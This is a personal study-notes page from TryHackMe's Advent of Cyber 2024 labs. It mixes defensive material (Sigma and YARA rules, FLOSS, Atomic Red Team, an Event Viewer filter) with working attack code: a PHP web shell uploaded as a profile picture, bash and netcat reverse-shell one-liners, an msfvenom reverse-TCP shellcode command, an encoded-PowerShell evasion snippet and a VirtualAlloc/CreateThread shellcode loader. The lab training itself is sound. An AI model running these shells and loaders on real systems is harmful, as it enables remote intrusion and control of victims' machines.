Skip to content
Site logo Site logo ucch45

Advent of Cyber 2024 notes

CVE - RCE and XSS

Github - link

The RCE exploit:

<!-- shell.php -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command']))
    {
        system($_GET['command'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

RCE is possible through unrestricted file upload. Once this “profile picture” is uploaded and updated, it is stored in the /admin/assets/img/profile/ directory. The file can then be accessed directly via http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php.

information gathering for linux

CommandUse
lsWill give you an idea of what files/directories surround you
catA command used to output the contents of documents such as text files
pwdWill give you an idea of where in the system you are
whoamiWill let you know who you are in the system
hostnameThe system name and potentially its role in the network
uname -aWill give you some system information like the OS, kernel version, and more
idIf the current user is assigned to any groups
ifconfigAllows you to understand the system’s network setup
bash -i >& /dev/tcp// 0>&1A command used to begin a reverse shell via bash
nc -e /bin/sh A command used to begin a reverse shell via Netcat
find / -perm -4000 -type f 2>/dev/nullFinds SUID (Set User ID) files, useful in privilege escalation attempts as it can sometimes be leveraged to execute binary with privileges of its owner (which is often root)
find / -writable -type  f 2>/dev/null | grep -v “/proc/“Also helpful in privilege escalation attempts used to find files with writable permissions

atomic red team - attack emulation

ParameterExplanationExample use
-Atomic TechniqueThis defines what technique you want to emulate. You can use the complete technique name or the “TXXXX” value. This flag can be omitted.Invoke-AtomicTest -AtomicTechnique T1566.001
-ShowDetailsShows the details of each test included in the Atomic.Invoke-AtomicTest T1566.001 -ShowDetails
-ShowDetailsBriefShows the title of each test included in the Atomic.Invoke-AtomicTest T1566.001 -ShowDetailsBrief
-CheckPrereqsProvides a check if all necessary components are present for testingInvoke-AtomicTest T1566.001 -CheckPrereqs
-TestNamesSets the tests you want to execute using the complete Atomic Test Name.Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment"
-TestGuidsSets the tests you want to execute using the unique test identifier.Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306
-TestNumbersSets the tests you want to execute using the test number. The scope is limited to the Atomic Technique.Invoke-AtomicTest T1566.001 -TestNumbers 2,3
-CleanupRun the cleanup commands that were configured to revert your machine state to normal.Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup

Sigma rule for T1566.001 for running the command:

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}

Terminal window
# PowerShellInvoke-WebRequest Sigma Rule


title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
  id: 1
  description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
 status: experimental
  author: TryHackMe
  logsource:
    category: process_creation
    product: windows
    service: sysmon
  detection:
   selection_invoke_webrequest:
      EventID: 1
      CommandLine|contains:
        - 'Invoke-WebRequest'
        - 'http://localhost/PhishingAttachment.xlsm'


    selection_file_creation:
      EventID: 11  # Sysmon Event ID for File Creation
      TargetFilename|endswith: '\PhishingAttachment.xlsm'


    condition: selection_invoke_webrequest or selection_file_creation
  falsepositives:
    - Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
  level: high
  tags:
    - attack.t1071.001   # Web Service - Application Layer Protocol
    - attack.t1059.001   # PowerShell
    - attack.t1105       # Ingress Tool Transfer
    - attack.t1566.001   # Spearphishing Attachment

YARA rule - detect registry query for sandbox

rule SANDBOXDETECTED
{
    meta:
        description = "Detects the sandbox by querying the registry key for Program Path"
        author = "TryHackMe"
        date = "2024-10-08"
        version = "1.1"


    strings:


    $cmd= "Software\\Microsoft\\Windows\\CurrentVersion\" /v ProgramFilesDir" nocase






    condition:
        $cmd
}

Evasion by encoding - obfuscation

void registryCheck() {
// Encoded PowerShell command to query the registry
    const char *encodedCommand = "RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIAIAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA=";
    // Prepare the PowerShell execution command
    char command[512];
    snprintf(command, sizeof(command), "powershell -EncodedCommand %s", encodedCommand);


    // Run the command
    int result = system(command);


    // Check for successful execution
    if (result == 0) {
        printf("Registry query executed successfully.\n");
    } else {
        fprintf(stderr, "Failed to execute registry query.\n");
    }
}

FLOSS - to extract obfuscated strings

Terminal window
PS C:\Tools\FLOSS> floss.exe C:\Tools\Malware\MerryChristmas.exe |Out-file C:\tools\malstrings.txt

XML to filter EventRecordID - Windows Event Viewer

<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
      *[System[(EventRecordID="INSERT_EVENT_record_ID_HERE")]]
    </Select>
  </Query>
</QueryList>

msfvenom to create shellcode

Terminal window
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.170.182 LPORT=1111 -f powershell

PowerShell script to load shellcode

Terminal window
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;


public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@


Add-Type $VrtAlloc


$WaitFor= @"
using System;
using System.Runtime.InteropServices;


public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@


Add-Type $WaitFor


$CrtThread= @"
using System;
using System.Runtime.InteropServices;


public class CrtThread{
 [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);


}
"@
Add-Type $CrtThread


[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")


© 2020-2025 Ucchas Muhury